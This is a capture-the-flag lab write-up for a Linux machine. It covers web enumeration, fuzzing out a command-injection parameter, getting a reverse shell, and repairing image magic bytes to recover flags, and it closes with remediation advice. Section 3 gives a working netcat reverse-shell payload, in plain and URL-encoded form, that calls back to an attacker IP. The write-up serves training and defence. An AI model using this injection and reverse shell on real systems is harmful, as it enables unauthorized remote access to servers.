Target IP: 10.10.x.x (Requires IP)
Difficulty: Easy/Medium
Objective: Web Access, Command Injection, and Forensic Data Recovery.
1. Executive Summary
“U.A. High School” is a Linux machine hosting a web server. Initial reconnaissance reveals a static website, but directory fuzzing uncovers a hidden assets directory. Further parameter fuzzing on a PHP script reveals a Command Injection vulnerability that returns Base64-encoded output. Initial access is gained via a reverse shell payload. The final flags are not obtained through traditional privilege escalation, but rather by downloading corrupted image files found on the server and repairing their Magic Bytes (File Headers) to reveal hidden data (Steganography).
Key TTPs (MITRE ATT&CK):
- T1190 (Exploit Public-Facing App): Command Injection via
cmdparameter. - T1027 (Obfuscated Files or Information): Base64 encoded responses and Steganography.
- T1005 (Data from Local System): Exfiltrating images for local forensic analysis.
- T1485 (Data Destruction/Manipulation): Recovering files with corrupted headers.
2. Enumeration
A. Network Scanning
nmap -sV -sC -A -T4 -Pn 10.10.x.xFindings:
- 80/tcp (HTTP): Apache Web Server.
- 22/tcp (SSH): Closed/Filtered (initially).
B. Web Enumeration
- Browsing: The main page is static. However, the
PHPSESSIDcookie suggests PHP is running on the backend. - Directory Fuzzing:
gobuster dir -u http://10.10.x.x/ -w /usr/share/wordlists/dirb/common.txt- Result:
/assetsdirectory found. - Deep Fuzzing: Inside
/assets, we findindex.php.
C. Parameter Fuzzing (The Injection Point)
We have /assets/index.php, but it displays nothing. We fuzz for parameters.
ffuf -u http://10.10.x.x/assets/index.php?FUZZ=id -w /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt -mc all- Result: The parameter
cmdreturns a response.
3. Initial Access: Command Injection
A. The Vulnerability
The server executes the system command passed to cmd but encodes the output in Base64 before returning it to the browser.
Verification:
curl -s "http://10.10.x.x/assets/index.php?cmd=id" | base64 -d
# Output: uid=33(www-data) gid=33(www-data) ...B. Gaining a Shell
To get a proper interactive shell, we inject a Netcat reverse shell payload. We must URL-encode the payload to ensure it executes correctly.
- Listener:
nc -lvnp 4444 - Payload:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.YOUR.IP 4444 >/tmp/f(URL Encoded for the browser):
%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66%3b%63%61%74%20%2f%74%6d%70%2f%66%7c%2f%62%69%6e%2f%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%30%2e%31%30%2e%59%4f%55%52%2e%49%50%20%34%34%34%34%20%3e%2f%74%6d%70%2f%66
Status: Shell as www-data.
4. Forensics: The Hidden Flags
A. Discovery
Enumerating the web directory (/var/www/html/assets/images) reveals two interesting files:
oneforall.jpgyuei.jpg
We download them to our attacker machine:
wget http://10.10.x.x/assets/images/yuei.jpg
wget http://10.10.x.x/assets/images/oneforall.jpgB. Analysis (Magic Bytes)
Trying to open oneforall.jpg fails. We suspect the file header (Magic Bytes) is corrupted.
1. Inspecting the Hex:
hexeditor oneforall.jpg
# or
xxd oneforall.jpg | headWe see bytes that do not match the standard JPEG header (FF D8 FF E0).
2. Repairing the File: We manually edit the first few bytes to match the correct signature for a JPEG.
- Change: First bytes ->
FF D8 FF E0(Standard JPEG). - Save: The file is now a valid image.
3. Result: Opening the repaired image reveals the flag (Steganography/Embedded Text).
(Repeat the process for yuei.jpg if necessary, potentially checking for PNG headers 89 50 4E 47 if the extension is misleading).
5. Remediation (Blue Team)
- Input Validation:
- The PHP script likely uses
exec($_GET['cmd'])orsystem(). This is incredibly dangerous. Remove this functionality entirely. - If system interaction is needed, use specific APIs or allow-listed commands only.
- Web Server Hardening:
- Disable directory listing (though fuzzing found it, listing makes it easier).
- Restrict access to sensitive directories like
/assetsif they contain backup or raw files.
- File Integrity:
- Monitor for changes to static assets (
.jpg). - The fact that corrupted files were serving as flag containers implies a lack of integrity monitoring on web assets.